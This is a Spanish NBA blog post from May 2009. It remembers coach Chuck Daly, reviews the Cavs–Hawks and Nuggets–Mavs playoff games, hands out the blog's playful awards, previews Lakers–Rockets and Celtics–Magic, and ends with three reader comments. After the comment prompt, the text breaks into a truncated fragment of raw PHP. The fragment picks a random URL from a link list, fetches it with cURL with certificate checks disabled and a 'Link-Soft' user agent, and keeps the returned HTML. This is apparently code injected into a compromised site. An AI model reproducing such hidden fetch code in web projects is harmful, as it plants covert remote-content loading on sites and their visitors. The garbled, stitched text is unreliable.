Playoffs (09/05/2009): Vistos para sentencia

10 de May de 2009 por Jabho

Ayer murió Chuck Daily. En nuestra memoria es el tipo que entrenó a los Bad Boys, con ese juego duro rozando lo sucio que ganó dos anillos. Un tipo que manejó de forma adecuada un vestuario con Rodman, Mahorn, Laimbeer o incluso el propio Thomas. Un grande de los banquillos que fue premiado con dirigir a un equipo único en la historia, el Dream Team de Barcelona´92. Estará en nuestro recuerdo por méritos propios.

Vamos con el repaso a la jornada de ayer. Nuggets y Cavs eran favoritos para pasar sus eliminatorias. Seguro. Pero la “facilidad” con la que se van a ver dentro de las finales de conferencia, especialmente los Cavs, da que pensar. Para ambos el punto de atención empezarán a ser los Lakers… Los Nuggets porque no les queda más remedio que ir paso a paso y, con los Mavs casi en la cuneta, los Lakers pintan a rival en la final. Los Cavs porque no tienen porque ir paso a paso y, sin Garnett en juego, se hace difícil pensar que alguien que no sean los angelinos vayan a poder pararlos…

Anoche los Cavs ganaron en Atlanta, campo nada fácil, con el MVP de la regular demostrando que busca el anillo. No fue de paliza, como venía siendo, y los Hawks plantaron la cara que pudieron, que algo es algo. Al menos obligaron a que Lebron jugara 43 minutos y se mantuviera sobre la pista hasta el final del partido en pista…

Pero estos Hawks se fueron de vacaciones al año pasado en primera ronda con aires de victoria porque forzaron a los Celtics al 7º partido. Y este, sin embargo, se iran trás pasar una ronda pero con peor sabor de boca… Durante la regular, y cuando han estado físicamente muy finos, han  tenido rachas muy buenas alternadas con otras de equipo mediocre. Estos Play Offs nos ofrecen más del equipo mediocre que otra cosa, y aunque ayer Horford jugó bastante y Marvin Williams algo, lo cierto es que no atraviesa el equipo su mejor momento de forma. Y si ya era difícil contra los Cavs no estando bien, estando regular la cosa puede ser sonrojante… Un par de datos: Los Cavs doblaron en rebotes a los Hawks (pues aún ganaron por poco) y cometieron casi la mitad de personales (sólo 11 tiros libres para los Hawks).

Como ya hemos dicho, partidazo de King James, ver sección MVP, y en general buen partido del quinteto titular de los de Cleveland. ¿Algo por lo que preocuparse? El banco poco o casi nada (salvo Joe Smtih, nada de nada). Ayer dio igual pero habrá días que necesitarán de ellos.

Mucho más emocionante estuvo el duelo MavsNuggets. Ganaron los Nuggets pero… ahora dice la NBA que la jugada final no está bien pitada y que sí, que hubo falta. Me hubiera gustado que ganaran los Mavs, pero como diría el anuncio de MasterCard, ver salir del campo a Cuban anoche no tiene precio. La cosa es que fue un partido lleno de alternativas en el que pudo ganar cualquiera. Con la vuelta de Howard y en Dallas, la eliminatoria se igualó y al duo Billups&Melo le dio replica Dirk secundado por los Howard, Terry, Bass… En fin, que una victoria de Dallas hubiera apretado la eliminatoria, pero esa jugada final, mal pitada pero tampoco bien ejecutada por parte de Wright (hay que ser contundente), nos deja casi sin opciones para los Mavs.

PREMIOS TJNBA

MVP: Los Play Offs son para los mejores o los mejores son para los Play Offs, que tanto monta, monta tanto. LeBron fue el mejor de la regular pero él sabe que su sitio en la historia lo debe marcar ahora. Anoche decidió el partido y casi la eliminatoria. Clin, clin caja. Esperamos ansiosos partidos de más exigencia.

El Rookie: Para la candidez de Wright en la defensa de la última jugada sobre Melo… ¿Qué no es rookie? Ah, perdon…

La Sorpresa: Flip Murray hizo un partido correcto contra los Cavs… por decir alguno.

La decepción: Los Hawks que no estan dando el nivel de un 2ª ronda.

El mayor esfuerzo en vano: El de Dirk Nowiztki que a pesar de sus problemas personales cuajó un buen partido pero no pudo evitar una derrota que les deja al borde del abismo.

RAZONES PARA TRASNOCHAR

Lakers@Rockets: No hubo sanción para Artest, no la merecía, y los Rockets tienen que ganar si o si para tener alguna opción pero se han despertado con la noticia de la baja por lesión para el resto de los Playoffs de Yao Ming. Nefasto panorama para ellos. Por su parte los Lakers deberían ganar y confirmar que no disfrutan complicándose la vida. Además a Gasol, y a casi todos, no les vendría mal acumular algo del descanso que parece que tendrán sus rivales. A las 21h30 hora española.

Celtics@Magic: Los Celtics estan tocados y heridos. Sinceramente creo que es el momento de rematarlos, porque ya se sabe que no hay que subestimar el corazón de un campeón. Si la serie vuelve a Boston igualada… cuidadín. Perkins tampoco ha sido sancionado (codazo ¿involuntario? a Pietrus en un bloqueo) y volverá Alston que a saber si es o no una buena noticia. A las 3h de la madrugada hora española.

Comenta

3 comentarios a esta entrada

  1. Txusma dice:
    #1

    Supongo q si Melo no hubiera clavado el triple, no se hubiera quejado nadie de los Mavs, no?

      Citar

  2. xapa_croack dice:
    #2

    Si se conforma lo del xino, es restarle casi un 80% en el juego interior que parece que se lo estaba ganando a pau y sobretodo a bynum.

      Citar

  3. telekoman dice:
    #3

    Veremos ahora que es lo que hace Phil Jackson ahora que Yao no está. ¿Devolverá a Bynum al quinteto titular para que coja minutos y pasará a Pau de 4 y Odom al banquillo, o dejará la historia como está? Más le valdría a los Lakers ganar el partido de forma contundente y darle descanso a Pau o no va a llegar en buenas condiciones.
    Por cierto, que manía tienen los entrenadores de allí de dejar que los jugadores del equipo contrario tiren para ganar. Anda que a los de aquí les iban a hacer lo que les ha hecho Carmelo a los Dallas.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>